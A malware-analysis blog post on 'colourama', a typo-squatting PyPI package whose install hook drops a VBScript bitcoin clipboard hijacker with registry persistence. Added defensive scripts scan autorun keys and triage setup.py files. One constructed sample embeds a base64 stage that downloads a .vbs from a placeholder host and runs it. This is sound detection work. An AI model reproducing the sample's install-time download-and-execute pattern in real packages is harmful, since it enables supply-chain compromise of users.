21 Oct 2018
If you’ve ever installed a PyPI package named ‘colourama’, you probably want to read further.
As mentioned in a previous blog post (Detecting Cyber Attacks on PyPI), for the last year I have been doing research on automated detection of malicious code in the PyPI repository. In an initial scan of the PyPI repository earlier this year, I detected eleven malicious packages and reported them to the PyPI maintainers privately. Since then, I’ve continued improving the detection tool and recently rescanned the PyPI repository.
While analyzing the data from the rescan, I discovered an interesting PyPI package named ‘colourama’. The package is typo-squatting the popular PyPI package named ‘colorama’. The ‘colourama’ package contains a malware dropper which targets Windows machines and downloads a second stage that implements a cryptocurrency clipboard hijacker written in VBScript. When the VBScript executes, it creates a new script and adds a Windows registry entry to execute it whenever the user logs into the machine. This script runs in the background and checks the Windows clipboard every 500 ms. If the script detects anything on the clipboard that resembles a bitcoin address, it replaces it with a bitcoin address under the attacker’s control. This means that whenever a user of the machine attempts to pay someone in bitcoin by copying a bitcoin address from an email or website, the address will be replaced by the attacker’s bitcoin address.
Details about the Colourama Package
The ‘colourama’ package has been on PyPI since December 5th, 2017. The author seems to have copied the colorama code and then added special installer code (the malware dropper). According to pypistats.org it has been downloaded 55 times in the last month. The package has been reported to the PyPI administrators.
It would be a good idea to uninstall the ‘colourama’ package; however, this will not stop or remove the malicious VBScript. The ‘colourama’ package downloads and installs the malicious VBScript during installation, but never uninstalls it.
Based on my analysis of the code, to fully remove this malware the following should be done (however, it is your responsibility to safely delete files and registry entries and do your own due diligence based on your specific PC):
- Delete the VBScript installed in PROGRAMDATA under “\Microsoft Essentials\Software Essentials.vbs”.
- Delete the “Microsoft Software Essentials” registry entry under “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run”.
- Stop the associated process (it will likely show up as ‘wscript’ in the process list), or alternatively restart the machine.
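The registry entry and the dropped script path in the steps above are the two indicators a defender can check for on many machines at once. The following is an added example, not code from the post: it parses a registry export of the Run keys and reports autorun values that either match the entry name and .vbs path given above or launch a script host at all. The sample export is constructed; in particular the command line stored in the value is an assumption, since the post only names the entry and the script path.

```python
"""Scan a Windows registry export (.reg text) of autorun keys for script-based
persistence such as the 'Microsoft Software Essentials' entry described above.

Added example, not from the original post. SAMPLE_REG is constructed; the
wscript.exe command line in it is an assumption.
"""
import re
from typing import Dict, List, Tuple

# Autostart keys to review (compared case-insensitively).
RUN_KEYS = {
    r"hkey_current_user\software\microsoft\windows\currentversion\run",
    r"hkey_local_machine\software\microsoft\windows\currentversion\run",
}

# Indicators taken from the post: the value name and the dropped script path.
SUSPECT_VALUE_NAMES = {"microsoft software essentials"}
SUSPECT_PATH_FRAGMENTS = [r"microsoft essentials\software essentials.vbs"]
# Generic signal: an autorun that starts a script host or a script file.
SCRIPT_HOSTS = ("wscript", "cscript", "mshta", ".vbs", ".js", ".ps1")

_VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')


def _unescape(s: str) -> str:
    """Undo .reg escaping of backslashes and double quotes."""
    return re.sub(r'\\(["\\])', r"\1", s)


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Return {key_path: {value_name: value_data}}; only string values are unescaped,
    other types (hex:, dword:) are kept raw."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current and line.startswith('"'):
            m = _VALUE_RE.match(line)
            if not m:
                continue
            name, data = _unescape(m.group(1)), m.group(2)
            if data.startswith('"') and data.endswith('"'):
                keys[current][name] = _unescape(data[1:-1])
            else:
                keys[current][name] = data
    return keys


def find_autorun_scripts(text: str) -> List[Tuple[str, str, str, str]]:
    """Return (key, value_name, data, reason) for suspicious autorun values."""
    findings = []
    for key, values in parse_reg_export(text).items():
        if key.lower() not in RUN_KEYS:
            continue
        for name, data in values.items():
            lname, ldata = name.lower(), data.lower()
            if lname in SUSPECT_VALUE_NAMES:
                reason = "value name matches the colourama persistence entry"
            elif any(frag in ldata for frag in SUSPECT_PATH_FRAGMENTS):
                reason = "command references the dropped .vbs path"
            elif any(h in ldata for h in SCRIPT_HOSTS):
                reason = "autorun launches a script host or script file"
            else:
                continue
            findings.append((key, name, data, reason))
    return findings


# Constructed sample export: one benign entry and the persistence entry.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"Microsoft Software Essentials"="wscript.exe \"C:\\ProgramData\\Microsoft Essentials\\Software Essentials.vbs\""
'''

if __name__ == "__main__":
    for key, name, data, reason in find_autorun_scripts(SAMPLE_REG):
        print(f"[!] {key}\\{name}\n    {data}\n    {reason}")
```

On a live machine the input comes from `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run run.reg`; that file is written as UTF-16, so read it with `encoding="utf-16"` before passing it in. Because the generic script-host rule fires on any autorun .vbs, treat those hits as leads to review rather than as confirmed infections.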
Detailed Analysis of the Malicious Code
The setup.py file in the ‘colourama’ package contains the following class that is called as part of the package install.
The request to ‘hxxps://grabify.link/E09EIF’ seems to be used for tracking installs of the package, since it just redirects to Taco Bell’s website and the response data is not used by the code. Using grabify.link gives the bad actor the ability to track the number of installs, the OS on which the package was installed and the IP address from which it was installed. The large base64 encoded string (redacted from the code snippet above for brevity) is decoded and executed as Python code. The code contained in the base64 encoded string is shown below:
The malicious code above first checks if it is running on a Windows system and then attempts to download a VBScript from hastebin; if that fails, it tries to download it from pastebin through a base64 encoded URI on github. Base64 encoded strings are used to obfuscate all URLs. The first try/except block in the code appears to be a diversion and doesn’t do anything useful other than generating an exception, so the code enters the second try/except block, where a request is made to hastebin and the response is written to a .vbs file which is then executed.
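The traits described above (a setuptools command class that runs at install time, a large base64 string handed to exec, base64-obfuscated URLs, and a download-then-execute second stage) can all be spotted statically without running setup.py. The following added example is not the author’s detection tool; it walks the Python AST of a setup.py, reports each of those traits, and when a base64 blob decodes to parseable Python it scans the decoded stage as well. SAMPLE_SETUP is a constructed stand-in built in the block itself (with example.invalid placeholder URLs), not colourama’s real setup.py.

```python
"""Static triage of a setup.py for install-time dropper behaviour: setuptools
command subclasses, exec()/eval() of base64-decoded data, base64 strings that
decode to URLs, long base64 blobs (scanned recursively when they are Python),
and network or process calls.

Added example, not the detection tool from the post. SAMPLE_SETUP is constructed.
"""
import ast
import base64
import binascii
import re
from typing import List

INSTALL_HOOKS = {"install", "develop", "egg_info", "build_py"}
NETWORK_ROOTS = {"urllib", "requests", "http", "socket"}
PROCESS_CALLS = {"os.system", "os.popen", "os.startfile", "subprocess.Popen",
                 "subprocess.call", "subprocess.run", "subprocess.check_call",
                 "subprocess.check_output"}
B64_RE = re.compile(r"^[A-Za-z0-9+/]{64,}={0,2}$")


def _dotted(node: ast.AST) -> str:
    """Render a Name/Attribute chain such as urllib.request.urlopen as a string."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def _b64(s: str) -> bytes:
    """Strict base64 decode; empty bytes when the string is not valid base64."""
    try:
        return base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return b""


def triage_setup_py(source: str, depth: int = 0, prefix: str = "") -> List[str]:
    """Return human-readable findings for one Python source, recursing into
    base64 blobs that decode to Python (at most two levels deep)."""
    findings: List[str] = []
    for node in ast.walk(ast.parse(source)):
        where = f"{prefix}line {getattr(node, 'lineno', '?')}"
        if isinstance(node, ast.ClassDef):
            hooks = {_dotted(b) for b in node.bases} & INSTALL_HOOKS
            if hooks:
                findings.append(f"{where}: class {node.name} overrides setuptools command {sorted(hooks)}")
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in ("exec", "eval"):
                nested = any(_dotted(c.func).endswith("b64decode")
                             for c in ast.walk(node) if isinstance(c, ast.Call))
                tag = " on base64-decoded data" if nested else ""
                findings.append(f"{where}: {name}() called{tag}")
            elif name.split(".")[0] in NETWORK_ROOTS:
                findings.append(f"{where}: network call {name}()")
            elif name in PROCESS_CALLS:
                findings.append(f"{where}: process execution via {name}()")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            decoded = _b64(node.value)
            if decoded.lower().startswith((b"http://", b"https://")):
                findings.append(f"{where}: base64 string decodes to URL {decoded.decode('utf-8', 'replace')}")
            elif B64_RE.match(node.value):
                findings.append(f"{where}: base64 blob of {len(node.value)} chars")
                if depth < 2:
                    try:
                        inner = decoded.decode("utf-8")
                        ast.parse(inner)
                    except (UnicodeDecodeError, SyntaxError):
                        continue
                    findings.extend(triage_setup_py(inner, depth + 1, f"{where} -> decoded "))
    return findings


# Constructed sample with the same shape as described in the post; URLs are placeholders.
_STAGE1_SRC = (
    "import os, urllib.request\n"
    "data = urllib.request.urlopen('https://example.invalid/stage2.vbs').read()\n"
    "open('stage2.vbs', 'wb').write(data)\n"
    "os.system('wscript stage2.vbs')\n"
)
_TRACK_B64 = base64.b64encode(b"https://tracker.example.invalid/ping").decode()
_STAGE1_B64 = base64.b64encode(_STAGE1_SRC.encode()).decode()
SAMPLE_SETUP = f'''
import base64, platform, urllib.request
from setuptools import setup
from setuptools.command.install import install

TRACK = "{_TRACK_B64}"
STAGE1 = "{_STAGE1_B64}"

class PostInstall(install):
    def run(self):
        install.run(self)
        urllib.request.urlopen(base64.b64decode(TRACK).decode())
        if platform.system() == "Windows":
            exec(base64.b64decode(STAGE1))

setup(name="example-pkg", version="0.1", cmdclass={{"install": PostInstall}})
'''

if __name__ == "__main__":
    for finding in triage_setup_py(SAMPLE_SETUP):
        print(finding)
```

None of these signals is malicious on its own (plenty of legitimate packages subclass install or fetch a resource), but a custom install command combined with exec of decoded data and a second stage that downloads and launches a script is exactly the profile described above, so a scanner can rank packages by how many of these co-occur.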
The VBScript downloaded from hastebin is shown below:
The script creates persistence through a registry entry and then creates a new script and executes it. This script will also start every time the user logs into the machine, and will monitor the Windows clipboard for bitcoin addresses and replace them with a bitcoin address of the bad actor’s choice.